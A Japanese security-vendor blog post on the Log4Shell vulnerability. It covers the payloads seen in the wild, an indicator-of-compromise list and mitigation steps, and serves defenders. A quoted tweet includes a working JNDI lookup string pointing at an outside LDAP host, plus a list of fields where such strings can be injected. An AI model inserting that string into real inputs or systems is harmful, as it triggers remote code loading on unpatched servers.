今、インターネットがどのように映っているかは、これを読んでいる人の立場によって異なります。
多くのユーザーは、12月10日(金) にApacheが公開したLog4Shell (Log4jまたはCVE-2021-44228とも呼ばれる脆弱性) について耳にし、それを扱った記事の内容やヘッドラインを見て、いったい何の騒ぎだろうと思ったかもしれません。しかし、もしあなたが多くのテクノロジー企業の担当者であるなら、おそらく週末以来この脆弱性にパッチを当て、可能な限り侵害を防止するために、ほとんど休みなく作業を続けていることでしょう。そして、疲れ果ててかすれた目でこの記事を読んていることだと思います。
Log4Shellに何が起こっているのか?
エフセキュアのCISO (最高情報セキュリティ責任者) であるErka Koivunen (エルカ・コイヴネン) は、インターネットを利用している人にとって、そしてインターネットの小さな部分を修正しようとしている人にとっても、Log4Shellで何が起こっているのかを理解するのが難しい理由を、配管に例えて説明しています。
「この脆弱性の発動は、ユーザーが利用するフロントエンドのサービスでは起こりません。毒はサービスプロバイダーのバックエンドの奥深くにある配管に入り、そこで爆発したり、その他の方法で実行されたりするのです。配管の問題点は、それがあらゆるところに接続されていることです。例えば、私がマンションに住んでいて、本来流してはいけないものを流してしまったとします。その物体はマンションの外に流れて、次の交差点の下にあるダクトや、さらにその先の廃水処理施設までたどり着くかもしれません。そこで配管を塞ぎ、最終的にパイプを破裂させてしまうかもしれません。ITサービスプロバイダーのインフラが破裂するのを見て、人々はようやく事態を理解し始めるかもしれません。人々はこう考えるでしょう。「次に何をトイレに流してみようか?」それでどうなるかも見る楽しみのためだけに実行しているのかもしれません。または、世界が炎上するのを見るのが好きな人もいるようです。」
Erkaはエフセキュアのポッドキャスト「Cyber Security Sauna」の最新エピソードにおいて、Log4Shellが企業にとってどのような意味を持つかを説明しています。
エフセキュアのスレットハンターたちが観測したペイロード
前回のエフセキュアのブログ記事では、Log4Shell の状況の概要、エフセキュアのユーザーへの影響、そしてこの全世界的な脅威を軽減するために何が可能であり実行されているのかを中心に説明しました。エフセキュアでは、状況の進展に合わせてソリューションに検知機能を追加し続けています。
本記事では、攻撃者がネットワークの潜在的なギャップホールを通じて実行しようとしている攻撃を見ていきます。エフセキュアのスレットハンターやその他のサイバーセキュリティ専門家がネットワークを監視した結果、以下のペイロードがこれまでに配信されています。
- xmrig
- kinsing
- Mirai
- Tsunami
- CobaltStrike
- Billgatesマルウェア
- Khonsariランサムウェア
- Orcus RAT
- リバースシェル
Khonsari ransowmareが、攻撃に成功した際のペイロードとして観測されたという報告もあります。過去の多くの事例からわかるように、CobaltStrike、リモートアクセスのトロイの木馬、リバースシェルなどの攻撃ツールは、最初のアクセスを確立し、より大規模なランサムウェア攻撃への足掛かりを築くために利用される可能性があります。
不正アクセスの指標リスト
エフセキュアのセキュリティエキスパートたちは複数のソースを統合し、Log4jが悪用された後にスキャン、侵害、またはその後のペイロード配信が行われたケースでの侵害の指標のExcelリストをまとめました (2021年12月14日)。
潜在的な攻撃対象領域
ネットワークセキュリティに携わる立場の人は、インターネットに接続されていないサーバーであっても、この脆弱性が複数の方法で誘発される可能性があることを知っておく必要があります。
Here are some ideas for potential attack surfaces for Log4J:
in your robots.txt 😏
in your dns records (txt…)
in your email headers
in your usernames
in your passwords
in your headers
in your e-mail addresses
in your files
in your SSL Certificates
in your EXIF#log4j— ?${jndi:ldap://resolv.network/a} (@ITSecurityguard) December 11, 2021
UserAgentもこのリストにを追加すべきでしょう。
いい知らせは、サーバーが攻撃者のURLに接続できなければ、攻撃はそこで止まるということです。
パッチの適用だけでは不十分:
さらに、Erkaは次の対応を勧めています。
- 可能であれば、Log4j2の全てのインスタンスを、2つ目の重要度の低いLog4jの脆弱性を修正したバージョン2.16.0にアップグレードしてください。
- Apacheは2.15.0を月曜日とヨーロッパ時間の金曜日の午前中の2回にわたって発行しています。もし自身が現在使用している2.15.0が「2.15.0-rc2」バージョンであるかどうか不明であるなら、2.16.0にアップデートしてください。”
- 2.16.0.を使用していない場合は、手動でルックアップ機能を無効にしてください。
- イグレスフィルタリングや、許可リストを備えた仕組みを使ってトラフィックをプロキシするなどして、アウトバウンド接続を制限してください。
これは、配管に毒を混入されないためにユーザーがすべき、最低限のことです。
カテゴリ